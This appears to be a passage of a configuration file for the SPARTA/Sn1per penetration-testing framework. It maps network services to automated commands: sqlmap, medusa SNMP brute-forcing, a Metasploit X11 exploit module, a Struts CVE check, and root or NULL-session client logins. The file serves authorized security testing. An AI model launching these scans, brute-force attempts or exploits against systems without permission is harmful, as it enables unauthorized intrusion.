sniperSqlmap=Run sqlmap, bash -c \"/usr/share/sparta/scripts/sniper_sqlmap.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_sqlmap_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt,mysql,ms-sql,ms-sql-s"
sniperSquid-http=Run sniper on squid, bash -c \"/usr/share/sparta/scripts/sniper_squid.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_squid_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "squid-http,http-proxy"
sniperSsh=Run sniper against ssh, bash -c \"/usr/share/sparta/scripts/sniper_ssh.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_ssh_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "ssh"
sniperSslscan=Run sniper sslscan, bash -c \"/usr/share/sparta/scripts/sniper_sslscan.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_sslscan_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "https"
sniperSslyze=Run sniper sslscan, bash -c \"/usr/share/sparta/scripts/sniper_sslyze.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_sslyze_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "https"
sniperTelnet=Run sniper against telnet, bash -c \"/usr/share/sparta/scripts/sniper_telnet.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_telnet_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "telnet"
sniperTestssl=Run sniper testssl, bash -c \"/usr/share/sparta/scripts/sniper_testssl.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_testssl_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "https"
sniperTomcat=Run sniper against tomcat, bash -c \"/usr/share/sparta/scripts/sniper_tomcat.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_tomcat_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
sniperWebmin=Run sniper against webmin, bash -c \"/usr/share/sparta/scripts/sniper_webmin.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_webmin_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
sniperWordpress=Run check for wordpress, bash -c \"/usr/share/sparta/scripts/sniper_wordpress.sh [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_sniper_wordpress_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
snmp-brute=Bruteforce community strings (medusa), bash -c \"medusa -h [IP] -u root -P ./wordlists/snmp-default.txt -M snmp | grep SUCCESS | tee /usr/share/sniper/loot/notes/Sparta_snmpMedusa_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "snmp,snmptrap"
snmp-default=Check for default community strings, bash -c \"python ./scripts/snmpbrute.py -t [IP] -p [PORT] -f ./wordlists/snmp-default.txt -b --no-colours | tee /usr/share/sniper/loot/notes/Sparta_snmpBrutePy_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "snmp,snmptrap"
snmpcheck=Run snmpcheck, bash -c \"snmpcheck -t [IP] | tee /usr/share/sniper/loot/notes/Sparta_snmpCheck_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "snmp,snmptrap"
sslscan=Run sslscan, bash -c \"sslscan --no-failed [IP]:[PORT] | tee /usr/share/sniper/loot/notes/Sparta_sslscan_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "https,ssl"
sslyze=Run sslyze, bash -c \"sslyze --regular [IP]:[PORT] | tee /usr/share/sniper/loot/notes/Sparta_sslyzeRegular_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "https,ssl,ms-wbt-server,imap,pop3,smtp"
sslyze2= Run sslyze, bash -c \"sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers [IP] | tee /usr/share/sniper/loot/notes/Sparta_sslyze2_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", https
sun-answerbookNmap=Run nmap scan, bash -c \"nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p [PORT] -T4 [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_sunAnswerbook_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "http"
vncNmap=Run nmap on vnc, bash -c \"nmap -A -sV -T4 --script=vnc* -p 5900 [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_vncNmap_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "vnc,rfb,vnc-1,vnc-2,vnc-3,vnc-http,vnc-http-1,vnc-http-2,vnc-http-3"
wafw00f=Run wafwoof, bash -c \"wafw00f http://[IP]:[PORT] | tee /usr/share/sniper/loot/notes/Sparta_wafoof_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
webslayer=Launch webslayer, webslayer | tee /usr/share/sniper/loot/notes/Sparta_webslayer_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt, "http,https,ssl,soap,http-proxy,http-alt"
whatweb=Run whatweb, bash -c \"whatweb [IP]:[PORT] --color=never | tee /usr/share/sniper/loot/notes/Sparta_whatweb_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
x11Meta=Run metasploit on x11, bash -c \"msfconsole -x 'use auxiliary/scanner/x11/open_x11\; tcp/scanner/x11/open_x11\; set RHOSTS [IP]\; setg PORT [PORT]\; exploit\;' | tee /usr/share/sniper/loot/notes/Sparta_x11Meta_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "X11"
x11Nmap=Run nmap on x11, bash -c \"nmap -A -sV -Pn -T4 --script=x11* -p [PORT] [IP] -oX /usr/share/sniper/loot/nmap/nmap[IP]-[PORT]_$(date +'%FT%H%M%S%3N').xml | tee /usr/share/sniper/loot/notes/Sparta_x11Nmap_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "X11"
x11screen=Run x11screenshot, bash -c \"./scripts/x11screenshot.sh [IP] | tee /usr/share/sniper/loot/notes/Sparta_x11Screenshot_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", X11
xsstracer=Run xsstracer, bash -c \"xsstracer [IP] [PORT] | tee /usr/share/sniper/loot/notes/Sparta_xsstracer_[IP]_[PORT]_$(date +'%FT%H%M%S')_out.txt\", "http,https,ssl,soap,http-proxy,http-alt"
[PortTerminalActions]
netcat=Open with netcat, nc -v [IP] [PORT],
telnet=Open with telnet, telnet [IP] [PORT],
ftp=Open with ftp client, ftp [IP] [PORT], ftp
mysql=Open with mysql client (as root), "mysql -u root -h [IP] --port=[PORT] -p", mysql
mssql=Open with mssql client (as sa), python /usr/share/doc/python-impacket-doc/examples/mssqlclient.py -p [PORT] sa@[IP], "mys-sql-s,codasrv-se"
ssh=Open with ssh client (as root), ssh root@[IP] -p [PORT], ssh
psql=Open with postgres client (as postgres), psql -h [IP] -p [PORT] -U postgres, postgres
rdesktop=Open with rdesktop, rdesktop [IP]:[PORT], ms-wbt-server
rpcclient=Open with rpcclient (NULL session), rpcclient [IP] -p [PORT] -U%, "netbios-ssn,microsoft-ds"
vncviewer=Open with vncviewer, vncviewer [IP]:[PORT], vnc
xephyr=Open with Xephyr, Xephyr -query [IP] :1, xdmcp
rlogin=Open with rlogin, rlogin -i root -p [PORT] [IP], login
rsh=Open with rsh, rsh -l root [IP], shell
[SchedulerSettings]
amt-soap-http_a=amt-soap-http, tcp
amt-soap-http_n=amt-soap-http, tcp
asfAmap="oob-ws-http,asf-rmcp,cryptoadmin", tcp
asfNmap="oob-ws-http,asf-rmcp,cryptoadmin", tcp
ccproxy-ftpMeta="ccproxy-ftp", tcp
ccproxy-ftpNmap="ccproxy-ftp", tcp
couchdbMeta="couchdb", tcp
couchdbNmap="couchdb", tcp
distccdMeta="distccd,distcc", tcp
distccdNmap="distccd,distcc", tcp
domainNmap="domain", tcp
domainNmap="domain",udp
dyna-accessNmap="dyna-access", tcp
enum4linux="netbios-ssn,microsoft-ds", tcp
execNmap="exec,biff", tcp
finger="finger", tcp
fingerNmap="finger", tcp
ftp-default=ftp, tcp
ftpMeta="ftp", tcp
ftpNmap="ftp", tcp
ircMeta="irc,ircu", tcp
ircNmap="irc,ircu", tcp
ldapNmap="ldap", tcp
ldapsearch"login,who", tcp
loginNmap="login,who", tcp
mongodb=mongod, tcp
ms-sql-sNmap="ms-sql-s", tcp
ms-wbt-server="ms-wbt-server", tcp
ms-wbt-serverNmap="ms-wbt-server", tcp
msRPC="msrpc", tcp
msrpcNmap="msrpc", tcp
mssql-default=ms-sql-s, tcp
mysql-default=mysql, tcp
nbtscan=netbios-ns, tcp
ndmp="ndmp,snet-sensor-mgmt", tcp
oracle-default=oracle-tns, tcp
oracle-sid=oracle-tns, tcp
oracle-version=oracle-tns, tcp
pharosNmap="pharos", tcp
pop3Nmap="pop3", tcp
postgres-default=postgresql, tcp
postgresqlNmap="postgresql", tcp
rdp-sec-check=ms-wbt-server, tcp
rpcinfo=rpcbind, tcp
rwho=who, tcp
samrdump="netbios-ssn,microsoft-ds", tcp
shellAmap="shell,syslog", tcp
showmount=nfs, tcp
smartInstall=smart-install,tcp
smb-enum-admins="netbios-ssn,microsoft-ds", tcp
smb-enum-groups="netbios-ssn,microsoft-ds", tcp
smb-enum-policies="netbios-ssn,microsoft-ds", tcp
smb-enum-sessions="netbios-ssn,microsoft-ds", tcp
smb-enum-shares="netbios-ssn,microsoft-ds", tcp
smb-enum-users-rpc="netbios-ssn,microsoft-ds", tcp
smb-enum-users="netbios-ssn,microsoft-ds", tcp
smb-null-sessions="netbios-ssn,microsoft-ds", tcp
smbenum=microsoft-ds, tcp
smtp-enum-expn=smtp, tcp
smtp-enum-rcpt=smtp, tcp
smtp-enum-vrfy=smtp, tcp
smtpMeta="smtp", tcp
smtpNmap="smtp", tcp
snet-sensor-mgmt="ndmp,snet-sensor-mgmt", tcp
sniperArachni="http,ssl,soap,http-proxy,http-alt", tcp
sniperCmsmap="http,ssl,soap,http-proxy,http-alt", tcp
sniperCurl="http,ssl,soap,http-proxy,http-alt", tcp
sniperDirb="http,ssl,soap,http-proxy,http-alt", tcp
sniperJakarta="http,ssl,soap,http-proxy,http-alt", tcp
sniperMassbleed=https, tcp
sniperNikto="http,https,ssl,soap,http-proxy,http-alt", tcp
sniperNetbios="netbios-ssn,microsoft-ds", tcp
sniperNFS="nfs", tcp
sniperNmaphttp="http,ssl,soap,http-proxy,http-alt", tcp
sniperPhpmyadmin="http,ssl,soap,http-proxy,http-alt", tcp
sniperRmiregistry="rmiregistry", tcp
sniperRpcbind="rpcbind", tcp
sniperShellshock="http,ssl,soap,http-proxy,http-alt", tcp
sniperSnmp="snmp,snmptrap", tcp
sniperSqlmap="http,https,ssl,soap,http-proxy,http-alt,mysql,ms-sql,ms-sql-s", tcp
sniperSquid-http="squid-http,http-proxy", tcp
sniperSsh="ssh", tcp
sniperSslscan=https, tcp
sniperSslyze=https, tcp
sniperTelnet="telnet", tcp
sniperTestssl=https, tcp
sniperTomcat="http,ssl,soap,http-proxy,http-alt", tcp
sniperWebmin="http,ssl,soap,http-proxy,http-alt", tcp
sniperWordpress="http,ssl,soap,http-proxy,http-alt", tcp
snmp-brute="snmp,snmptrap", tcp
snmp-default="snmp,snmptrap", udp
snmpcheck="snmp,snmptrap", udp
sslyze="https,ssl,ms-wbt-server,imap,pop3,smtp", tcp
sslyze2="https", tcp
sun-answerbookNmap="http", tcp
vncNmap="vnc,rfb,vnc-1,vnc-2,vnc-3,vnc-http,vnc-http-1,vnc-http-2,vnc-http-3", tcp
wafw00f="http,ssl,soap,http-proxy,http-alt", tcp
whatweb="http,ssl,soap,http-proxy,http-alt", tcp
x11Meta="X11", tcp
x11Nmap="X11", tcp
x11screen=X11, tcp